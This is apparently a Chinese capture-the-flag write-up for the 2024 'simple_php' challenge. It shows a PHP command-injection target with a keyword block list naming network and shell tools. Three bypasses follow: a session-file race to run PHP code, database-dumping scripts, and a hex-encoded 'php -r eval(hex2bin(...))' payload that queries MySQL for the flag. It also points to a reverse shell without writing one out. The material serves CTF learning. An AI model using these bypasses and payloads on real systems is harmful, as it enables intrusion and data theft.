国赛2024 simple_php(三种方法)
<pre><code><?phpini_set('open_basedir', '/var/www/html/');
error_reporting(0);
if(isset($_POST['cmd'])){
$cmd = escapeshellcmd($_POST['cmd']);
if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|ping|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget|\'|\"|id|whoami/i', $cmd)) {
system($cmd);
}
}
show_source(__FILE__);
?>
</code></pre>
<p>题目如上过滤了很多</p>
<h3 id="方法一">方法一:</h3>
<p>经过测试发现可以利用session文件包含</p>
<p>意思就是你传一个post请求包</p>
<p>他会生成一个临sess_+时文件</p>
<p>文件名即为/sess_+PHPSESSID值</p>
<p><img src="https://img2024.cnblogs.com/blog/3450162/202405/3450162-20240521181848234-1060619398.png" alt="" loading="lazy"></p>
<p>临时文件在/tmp/sess_aaaa下</p>
<p>系统会删除这个文件</p>
<p>我们要在它删除之前去访问它(条件竞争)</p>
<p>直接post传cmd=php /tmp/sess_aaaa</p>
<p><img src="https://img2024.cnblogs.com/blog/3450162/202405/3450162-20240521181918047-371035863.png" alt="" loading="lazy"></p>
<p>两个文件同时去发包</p>
<p><img src="https://img2024.cnblogs.com/blog/3450162/202405/3450162-20240521181948923-1505968831.png" alt="" loading="lazy"></p>
<p>在构建的post包123处写上想要执行的代码即可</p>
<pre><code><?php system('ls /');?>
</code></pre>
<p>执行后没找到flag</p>
<p>怀疑在数据库中</p>
<p>利用php脚本去链接数据库</p>
<pre><code><?php
// 建立连接
$conn = new mysqli("localhost", "root", "root");
// 检查连接
if ($conn->connect_error) {
die("连接失败: " . $conn->connect_error);
}
// 查询所有数据库名
$sql = "SHOW DATABASES";
$result = $conn->query($sql);
// 输出数据库名
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
echo "数据库名:" . $row["Database"] . "<br>";
}
} else {
echo "未找到数据库。";
}
// 关闭连接
$conn->close();
?>
</code></pre>
<p><img src="https://img2024.cnblogs.com/blog/3450162/202405/3450162-20240521182008064-626873238.png" alt="" loading="lazy"></p>
<p>成功</p>
<p>并且发现可疑数据库</p>
<p>继续查表</p>
<pre><code><?php
// 数据库连接信息
$servername = "localhost";
$username = "root";
$password = "root";
$dbname = "PHP_CMS";
// 创建连接
$conn = new mysqli($servername, $username, $password, $dbname);
// 检查连接
if ($conn->connect_error) {
die("连接失败: " . $conn->connect_error);
}
// 查询所有表名
$sql = "SHOW TABLES";
$result = $conn->query($sql);
// 输出表名
if ($result->num_rows > 0) {
echo "数据库 " . $dbname . " 中的表名:<br>";
while($row = $result->fetch_assoc()) {
echo $row["Tables_in_PHP_CMS"] . "<br>";
}
} else {
echo "该数据库中没有表。";
}
// 关闭连接
$conn->close();
?>
</code></pre>
<p><img src="https://img2024.cnblogs.com/blog/3450162/202405/3450162-20240521182025925-2077278307.png" alt="" loading="lazy"></p>
<p>发现可疑表F1ag_Se3Re7</p>
<p>接着去查表中内容</p>
<pre><code><?php
// 数据库连接信息
$servername = "localhost";
$username = "root";
$password = "root";
$dbname = "PHP_CMS";
// 创建连接
$conn = new mysqli($servername, $username, $password, $dbname);
// 检查连接
if ($conn->connect_error) {
die("连接失败: " . $conn->connect_error);
}
// 查询 F1ag_Se3Re7 表中的内容
$sql = "SELECT * FROM F1ag_Se3Re7";
$result = $conn->query($sql);
// 输出内容
if ($result->num_rows > 0) {
echo "F1ag_Se3Re7 表中的内容:<br>";
while($row = $result->fetch_assoc()) {
// 输出每行数据
foreach ($row as $key => $value) {
echo $key . ": " . $value . "<br>";
}
echo "<br>";
}
} else {
echo "F1ag_Se3Re7 表中没有数据。";
}
// 关闭连接
$conn->close();
?>
</code></pre>
<p><img src="https://img2024.cnblogs.com/blog/3450162/202405/3450162-20240521182045896-991994328.png" alt="" loading="lazy"></p>
<p>得到flag</p>
<p>ctfshow{2c8541c2-ad6e-42a5-93c1-fe2e2fb1243c}</p>
<h3 id="方法二">方法二:</h3>
<p>和方法一类似</p>
<p>前提是你需要有一个服务器(我的服务器出了些问题就不演示了,有什么难点可以找我讨论)</p>
<p>还是用上面的方法</p>
<p>直接去反弹shell(反弹shell的命令网上有,用php的)</p>
<h3 id="方法三">方法三:</h3>
<p>这里的环境是比赛时的环境</p>
<p>过滤比较多</p>
<p>但还可以利用php -r</p>
<p>后面用编码绕过</p>
<p><img src="https://img2024.cnblogs.com/blog/3450162/202405/3450162-20240521182107865-1817146319.png" alt="" loading="lazy"></p>
<p><img src="https://img2024.cnblogs.com/blog/3450162/202405/3450162-20240521182145149-1635038541.png" alt="" loading="lazy"></p>
<p>目录中没有flag怀疑在数据库中</p>
<p><img src="https://img2024.cnblogs.com/blog/3450162/202405/3450162-20240521182159647-1676765937.png" alt="" loading="lazy"></p>
<p>接下来连接数据库执行命令</p>
<p><img src="https://img2024.cnblogs.com/blog/3450162/202405/3450162-20240521182305579-825336701.png" alt="" loading="lazy"></p>
<p>先查库</p>
<p><img src="https://img2024.cnblogs.com/blog/3450162/202405/3450162-20240521182325011-741543612.png" alt="" loading="lazy"></p>
<pre><code><?php
$a="echo `mysql -u root -p'root' -e 'use PHP_CMS;show tables;'`;";
$b=bin2hex($a);
echo $b;
?>
</code></pre>
<pre><code>结果:6563686f20606d7973716c202d7520726f6f74202d7027726f6f7427202d652027757365205048505f434d533b73686f77207461626c65733b27603b
</code></pre>
<p>查表</p>
<p>再查表中内容</p>
<pre><code><?php
$a="echo `mysql -u root -p'root' -e 'use PHP_CMS;show tables;select * from F1ag_Se3Re7;'`;";
$b=bin2hex($a);
echo $b;
?>
</code></pre>
<p>即可</p>
<pre><code>cmd=php -r eval(hex2bin(substr(s6563686f20606d7973716c202d7520726f6f74202d7027726f6f7427202d652027757365205048505f434d533b73686f77207461626c65733b73656c656374202a2066726f6d20463161675f5365335265373b27603b,1)));
</code></pre>
<p><img src="https://img2024.cnblogs.com/blog/3450162/202405/3450162-20240521182356715-1443104630.png" alt="" loading="lazy"></p>
<p>也可得到flag</p><br><br>
来源:https://www.cnblogs.com/dghh/p/18204666
頁:
[1]